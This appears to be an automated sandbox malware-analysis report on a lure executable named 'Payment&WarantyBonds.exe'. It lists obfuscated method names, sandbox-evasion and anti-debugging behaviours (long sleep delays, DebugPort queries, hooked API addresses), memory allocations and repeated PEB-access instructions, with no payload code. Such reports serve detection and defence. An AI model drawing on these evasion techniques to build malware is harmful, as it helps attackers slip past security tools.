                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Payment&WarantyBonds.exe PID: 6900, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 2800000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 29C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 49C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 88D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 98D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 9AD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: AAD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: B510000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: C510000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: D510000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D1C0 rdtsc 2_2_0149D1C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 2967
                Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 7006
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 1880Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep count: 2967 > 30
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep time: -5934000s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep count: 7006 > 30
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904Thread sleep time: -14012000s >= -30000s
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep count: 37 > 30
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -55500s >= -30000s
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0056C500
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4147684727.000000000065F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2367290792.0000016C5E48C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417643 LdrLoadDll,2_2_00417643
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419148 mov eax, dword ptr fs:[00000030h]2_2_01419148
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B4144 mov ecx, dword ptr fs:[00000030h]2_2_014B4144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427152 mov eax, dword ptr fs:[00000030h]2_2_01427152
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B8158 mov eax, dword ptr fs:[00000030h]2_2_014B8158
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01426154 mov eax, dword ptr fs:[00000030h]2_2_01426154
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C156 mov eax, dword ptr fs:[00000030h]2_2_0141C156
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5152 mov eax, dword ptr fs:[00000030h]2_2_014F5152
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B9179 mov eax, dword ptr fs:[00000030h]2_2_014B9179
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h]2_2_0141F172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov ecx, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h]2_2_014CA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E0115 mov eax, dword ptr fs:[00000030h]2_2_014E0115
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01450124 mov eax, dword ptr fs:[00000030h]2_2_01450124
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421131 mov eax, dword ptr fs:[00000030h]2_2_01421131
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h]2_2_0141B136
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F51CB mov eax, dword ptr fs:[00000030h]2_2_014F51CB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E61C3 mov eax, dword ptr fs:[00000030h]2_2_014E61C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D1D0 mov eax, dword ptr fs:[00000030h]2_2_0145D1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0145D1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0149E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F61E5 mov eax, dword ptr fs:[00000030h]2_2_014F61E5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014451EF mov eax, dword ptr fs:[00000030h]2_2_014451EF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014251ED mov eax, dword ptr fs:[00000030h]2_2_014251ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C71F9 mov esi, dword ptr fs:[00000030h]2_2_014C71F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014501F8 mov eax, dword ptr fs:[00000030h]2_2_014501F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01460185 mov eax, dword ptr fs:[00000030h]2_2_01460185
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DC188 mov eax, dword ptr fs:[00000030h]2_2_014DC188
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A019F mov eax, dword ptr fs:[00000030h]2_2_014A019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h]2_2_0141A197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01477190 mov eax, dword ptr fs:[00000030h]2_2_01477190
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h]2_2_014D11A4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143B1B0 mov eax, dword ptr fs:[00000030h]2_2_0143B1B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422050 mov eax, dword ptr fs:[00000030h]2_2_01422050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C705E mov ebx, dword ptr fs:[00000030h]2_2_014C705E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C705E mov eax, dword ptr fs:[00000030h]2_2_014C705E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B052 mov eax, dword ptr fs:[00000030h]2_2_0144B052
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A6050 mov eax, dword ptr fs:[00000030h]2_2_014A6050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A106E mov eax, dword ptr fs:[00000030h]2_2_014A106E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5060 mov eax, dword ptr fs:[00000030h]2_2_014F5060
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov ecx, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144C073 mov eax, dword ptr fs:[00000030h]2_2_0144C073
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D070 mov ecx, dword ptr fs:[00000030h]2_2_0149D070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A4000 mov ecx, dword ptr fs:[00000030h]2_2_014A4000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h]2_2_0143E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A020 mov eax, dword ptr fs:[00000030h]2_2_0141A020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C020 mov eax, dword ptr fs:[00000030h]2_2_0141C020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E903E mov eax, dword ptr fs:[00000030h]2_2_014E903E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D0C0 mov eax, dword ptr fs:[00000030h]2_2_0149D0C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A20DE mov eax, dword ptr fs:[00000030h]2_2_014A20DE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F50D9 mov eax, dword ptr fs:[00000030h]2_2_014F50D9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014490DB mov eax, dword ptr fs:[00000030h]2_2_014490DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014450E4 mov eax, dword ptr fs:[00000030h]2_2_014450E4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014450E4 mov ecx, dword ptr fs:[00000030h]2_2_014450E4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0141A0E3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A60E0 mov eax, dword ptr fs:[00000030h]2_2_014A60E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014280E9 mov eax, dword ptr fs:[00000030h]2_2_014280E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C0F0 mov eax, dword ptr fs:[00000030h]2_2_0141C0F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014620F0 mov ecx, dword ptr fs:[00000030h]2_2_014620F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142208A mov eax, dword ptr fs:[00000030h]2_2_0142208A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AD080 mov eax, dword ptr fs:[00000030h]2_2_014AD080
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D08D mov eax, dword ptr fs:[00000030h]2_2_0141D08D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01425096 mov eax, dword ptr fs:[00000030h]2_2_01425096
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144D090 mov eax, dword ptr fs:[00000030h]2_2_0144D090
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145909C mov eax, dword ptr fs:[00000030h]2_2_0145909C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B80A8 mov eax, dword ptr fs:[00000030h]2_2_014B80A8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E60B8 mov eax, dword ptr fs:[00000030h]2_2_014E60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E60B8 mov ecx, dword ptr fs:[00000030h]2_2_014E60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h]2_2_0141D34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h]2_2_0141D34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5341 mov eax, dword ptr fs:[00000030h]2_2_014F5341
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419353 mov eax, dword ptr fs:[00000030h]2_2_01419353
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419353 mov eax, dword ptr fs:[00000030h]2_2_01419353
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov ecx, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EA352 mov eax, dword ptr fs:[00000030h]2_2_014EA352
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF367 mov eax, dword ptr fs:[00000030h]2_2_014DF367
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C437C mov eax, dword ptr fs:[00000030h]2_2_014C437C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C310 mov ecx, dword ptr fs:[00000030h]2_2_0141C310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01440310 mov ecx, dword ptr fs:[00000030h]2_2_01440310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E132D mov eax, dword ptr fs:[00000030h]2_2_014E132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E132D mov eax, dword ptr fs:[00000030h]2_2_014E132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F32A mov eax, dword ptr fs:[00000030h]2_2_0144F32A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01417330 mov eax, dword ptr fs:[00000030h]2_2_01417330
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DC3CD mov eax, dword ptr fs:[00000030h]2_2_014DC3CD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
